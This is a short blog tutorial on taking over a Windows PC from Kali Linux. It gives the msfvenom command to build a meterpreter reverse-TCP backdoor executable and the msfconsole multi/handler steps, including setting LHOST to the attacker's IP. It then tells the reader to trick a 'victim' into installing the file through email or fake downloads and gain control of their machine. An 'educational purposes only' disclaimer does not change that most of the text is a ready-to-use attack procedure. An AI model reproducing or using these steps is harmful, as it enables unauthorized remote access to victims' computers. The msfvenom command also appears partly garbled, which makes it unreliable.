Skip to main content

Hack window pc using kali linux Creating the Payload


Hey guys, we are back with a simple tutorial to hack with linux by using Tool

after getting a lot of requests from our users, we decided to post this article about how to hack with Kali linux

We have already posted an article about how to use and Installation of some Hacking Tools, if you have missed that article then

You Can Read It here: 



Warning
This Tutorials is Only For Educational Purposes Only and we are no more responsible for any mistake you do








Step 1: Creating the Payload

Creating the Payload
To Hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create payload for windows.
Open terminal and Type
msfvenom -p windows/meterpreter/reverse_tcp - platform windows-a x86 -f exe -o /root/Desktop/back.exe



Step 2: Starting the Metasploit Framework Console

Starting the Metasploit Framework Console
For controlling the payload we need to start the Metasploit Framework Concole which is prebuilt in Kali Linux.
The Metasploit Framework Console has many payloads and many exploit method.
To start the Metasploit Framework Console. In the terminal type
msfconsole



Step 3: Choosing the Exploit Method

Choosing the Exploit Method
As I have said the Metasploit Framework Console has many exploitation method.
In this we will use the multi handler.
Type
use exploit/multi/handler




Step 4: Setting the Payload

Setting the Payload
In above step we set our exploitation method. In this step we need to specify the payload that we have created.
Type
set payload windows/meterpreter/reverse_tcp



Step 5: Providing Ip for Backdooring

Providing Ip for Backdooring
In this step we need to provide the ip address of our machine so that the payload will connect to our system.
To find the ip address, open terminal and type ifconfig, and copy your ip address.
Then we have to set it in the msfconsole, so type
set LHOST (your ip address)


Step 6: Sending the File and Exploiting

Sending the File and Exploiting
After we have given all the information. We need to send the .exe file we created before to the victim via mail or fake downloads. make sure that the victim install the files.
After doing it, in the msfconsole command, type
exploit
After this command it will show you the victim terminal and you can control it.





Comments

Popular posts from this blog